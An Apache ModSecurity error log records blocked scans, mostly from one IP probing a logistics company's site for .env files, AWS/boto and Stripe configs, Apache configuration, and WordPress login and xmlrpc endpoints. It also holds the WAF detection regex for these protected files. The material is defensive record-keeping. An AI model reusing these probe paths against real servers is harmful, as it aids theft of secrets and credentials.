[Tue May 26 14:49:03.787882 2026] [security2:error] [pid 648203:tid 648369] [client 195.178.110.199:60378] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/cms/.env"] [unique_id "ahVlh7EQDDtxJNiDrdTiSQAAAKk"]
[Tue May 26 14:49:03.807896 2026] [security2:error] [pid 648203:tid 648347] [client 195.178.110.199:60394] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/config/aws.php"] [unique_id "ahVlh7EQDDtxJNiDrdTiSwAAAJM"]
[Tue May 26 14:49:03.869880 2026] [security2:error] [pid 648203:tid 648456] [client 195.178.110.199:60314] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/config/.env"] [unique_id "ahVlh7EQDDtxJNiDrdTiTAAAAQA"]
[Tue May 26 14:49:03.946686 2026] [security2:error] [pid 648203:tid 648341] [client 195.178.110.199:56130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/config/config.php"] [unique_id "ahVlh7EQDDtxJNiDrdTiTgAAAI0"]
[Tue May 26 14:49:04.164043 2026] [autoindex:error] [pid 648203:tid 648359] [client 15.204.161.7:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:49:04.988469 2026] [security2:error] [pid 648203:tid 648438] [client 104.194.153.222:60500] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 222.153.194.104.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVliLEQDDtxJNiDrdTibQAAAO4"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 14:49:04.988661 2026] [security2:error] [pid 648203:tid 648438] [client 104.194.153.222:60500] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVliLEQDDtxJNiDrdTibQAAAO4"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 14:49:05.076021 2026] [security2:error] [pid 648203:tid 648378] [client 195.178.110.199:60304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/config/env.php"] [unique_id "ahVlibEQDDtxJNiDrdTidgAAALI"]
[Tue May 26 14:49:05.154594 2026] [security2:error] [pid 648203:tid 648423] [client 195.178.110.199:60420] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/config/module.config.php"] [unique_id "ahVlibEQDDtxJNiDrdTieQAAAN8"]
[Tue May 26 14:49:05.294101 2026] [security2:error] [pid 648203:tid 648449] [client 195.178.110.199:60440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/config/config.inc.php"] [unique_id "ahVlibEQDDtxJNiDrdTigwAAAPk"]
[Tue May 26 14:49:05.351397 2026] [security2:error] [pid 648203:tid 648380] [client 39.106.67.230:49887] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.67.106.39.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/caches/log/Zmlcd.php"] [unique_id "ahVlibEQDDtxJNiDrdTiggAAALQ"]
[Tue May 26 14:49:05.556087 2026] [security2:error] [pid 648203:tid 648335] [client 104.167.25.180:33977] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVliLEQDDtxJNiDrdTiXwAAAIc"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:05.775331 2026] [security2:error] [pid 648203:tid 648451] [client 195.178.110.199:56146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/config/stripe.php"] [unique_id "ahVlibEQDDtxJNiDrdTingAAAPs"]
[Tue May 26 14:49:05.894076 2026] [security2:error] [pid 648203:tid 648417] [client 74.249.173.207:38981] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/rip.php"] [unique_id "ahVlibEQDDtxJNiDrdTipwAAANk"]
[Tue May 26 14:49:05.942420 2026] [security2:error] [pid 648203:tid 648437] [client 195.178.110.199:60408] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/config/nexmo.php"] [unique_id "ahVlibEQDDtxJNiDrdTiqwAAAO0"]
[Tue May 26 14:49:05.971801 2026] [security2:error] [pid 648203:tid 648345] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlibEQDDtxJNiDrdTijQAAAJE"]
[Tue May 26 14:49:06.185925 2026] [security2:error] [pid 648203:tid 648379] [client 104.194.153.222:60574] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVlirEQDDtxJNiDrdTisgAAALM"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 14:49:06.385458 2026] [security2:error] [pid 648203:tid 648440] [client 195.178.110.199:56176] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/crm/.env"] [unique_id "ahVlirEQDDtxJNiDrdTiyAAAAPA"]
[Tue May 26 14:49:06.387677 2026] [security2:error] [pid 648203:tid 648349] [client 195.178.110.199:56182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/cron/.env"] [unique_id "ahVlirEQDDtxJNiDrdTiyQAAAJU"]
[Tue May 26 14:49:06.409392 2026] [security2:error] [pid 648203:tid 648337] [client 45.148.10.5:56140] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/api/.env"] [unique_id "ahVlirEQDDtxJNiDrdTiywAAAIk"]
[Tue May 26 14:49:06.487120 2026] [security2:error] [pid 648203:tid 648374] [client 195.178.110.199:56192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/dev/.env"] [unique_id "ahVlirEQDDtxJNiDrdTi0wAAAK4"]
[Tue May 26 14:49:06.635421 2026] [security2:error] [pid 648203:tid 648451] [client 195.178.110.199:60318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/developer/.env"] [unique_id "ahVlirEQDDtxJNiDrdTi3QAAAPs"]
[Tue May 26 14:49:06.764050 2026] [security2:error] [pid 648203:tid 648401] [client 195.178.110.199:56132] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/demo/.env"] [unique_id "ahVlirEQDDtxJNiDrdTi4AAAAMk"]
[Tue May 26 14:49:06.884490 2026] [security2:error] [pid 648203:tid 648390] [client 195.178.110.199:56168] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/develop/.env"] [unique_id "ahVlirEQDDtxJNiDrdTi5wAAAL4"]
[Tue May 26 14:49:07.065593 2026] [security2:error] [pid 648203:tid 648340] [client 195.178.110.199:56132] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/development/.env"] [unique_id "ahVli7EQDDtxJNiDrdTi9QAAAIw"]
[Tue May 26 14:49:07.237412 2026] [security2:error] [pid 648203:tid 648387] [client 195.178.110.199:60462] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/etc/boto.cfg"] [unique_id "ahVli7EQDDtxJNiDrdTjAAAAALs"]
[Tue May 26 14:49:07.406960 2026] [security2:error] [pid 648203:tid 648404] [client 195.178.110.199:56216] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/current/.env"] [unique_id "ahVli7EQDDtxJNiDrdTjCQAAAMw"]
[Tue May 26 14:49:07.531495 2026] [security2:error] [pid 648203:tid 648394] [client 195.178.110.199:60378] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/erp/.env"] [unique_id "ahVli7EQDDtxJNiDrdTjEwAAAMI"]
[Tue May 26 14:49:07.547457 2026] [security2:error] [pid 648203:tid 648385] [client 195.178.110.199:56204] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/etc/apache2/apache2.conf"] [unique_id "ahVli7EQDDtxJNiDrdTjFQAAALk"]
[Tue May 26 14:49:07.562430 2026] [security2:error] [pid 648203:tid 648406] [client 195.178.110.199:56164] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/frontend/.env"] [unique_id "ahVli7EQDDtxJNiDrdTjFgAAAM4"]
[Tue May 26 14:49:07.668498 2026] [security2:error] [pid 648203:tid 648368] [client 195.178.110.199:60302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/fe/.env"] [unique_id "ahVli7EQDDtxJNiDrdTjGgAAAKg"]
[Tue May 26 14:49:07.724073 2026] [security2:error] [pid 648203:tid 648346] [client 45.3.46.114:22899] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlirEQDDtxJNiDrdTi3AAAAJI"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:08.177385 2026] [security2:error] [pid 648203:tid 648376] [client 195.178.110.199:56162] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/market/.env"] [unique_id "ahVljLEQDDtxJNiDrdTjOAAAALA"]
[Tue May 26 14:49:08.215916 2026] [security2:error] [pid 648203:tid 648370] [client 195.178.110.199:56168] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/marketing/.env"] [unique_id "ahVljLEQDDtxJNiDrdTjOQAAAKo"]
[Tue May 26 14:49:08.249050 2026] [security2:error] [pid 648203:tid 648375] [client 195.178.110.199:56176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/infos.php"] [unique_id "ahVljLEQDDtxJNiDrdTjOwAAAK8"]
[Tue May 26 14:49:08.292513 2026] [security2:error] [pid 648203:tid 648415] [client 195.178.110.199:56164] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/front/.env"] [unique_id "ahVljLEQDDtxJNiDrdTjPwAAANc"]
[Tue May 26 14:49:08.343444 2026] [security2:error] [pid 648203:tid 648361] [client 195.178.110.199:56216] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/lms/.env"] [unique_id "ahVljLEQDDtxJNiDrdTjQgAAAKE"]
[Tue May 26 14:49:08.422709 2026] [security2:error] [pid 648203:tid 648421] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVli7EQDDtxJNiDrdTjJwAAAN0"]
[Tue May 26 14:49:08.538061 2026] [security2:error] [pid 648203:tid 648386] [client 195.178.110.199:60378] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/info.php"] [unique_id "ahVljLEQDDtxJNiDrdTjSgAAALo"]
[Tue May 26 14:49:08.603962 2026] [security2:error] [pid 648203:tid 648429] [client 195.178.110.199:56216] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/laravel/.env"] [unique_id "ahVljLEQDDtxJNiDrdTjUAAAAOU"]
[Tue May 26 14:49:08.632722 2026] [security2:error] [pid 648203:tid 648342] [client 195.178.110.199:60302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/media/.env"] [unique_id "ahVljLEQDDtxJNiDrdTjUQAAAI4"]
[Tue May 26 14:49:08.707098 2026] [security2:error] [pid 648203:tid 648349] [client 195.178.110.199:56182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/local/.env"] [unique_id "ahVljLEQDDtxJNiDrdTjVgAAAJU"]
[Tue May 26 14:49:08.711583 2026] [security2:error] [pid 648203:tid 648394] [client 195.178.110.199:60462] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/new/.env"] [unique_id "ahVljLEQDDtxJNiDrdTjVwAAAMI"]
[Tue May 26 14:49:08.739280 2026] [security2:error] [pid 648203:tid 648334] [client 195.178.110.199:56168] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/node/backend/.env"] [unique_id "ahVljLEQDDtxJNiDrdTjXAAAAIY"]
[Tue May 26 14:49:08.743029 2026] [security2:error] [pid 648203:tid 648456] [client 195.178.110.199:56164] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/nodeapi/.env"] [unique_id "ahVljLEQDDtxJNiDrdTjXQAAAQA"]
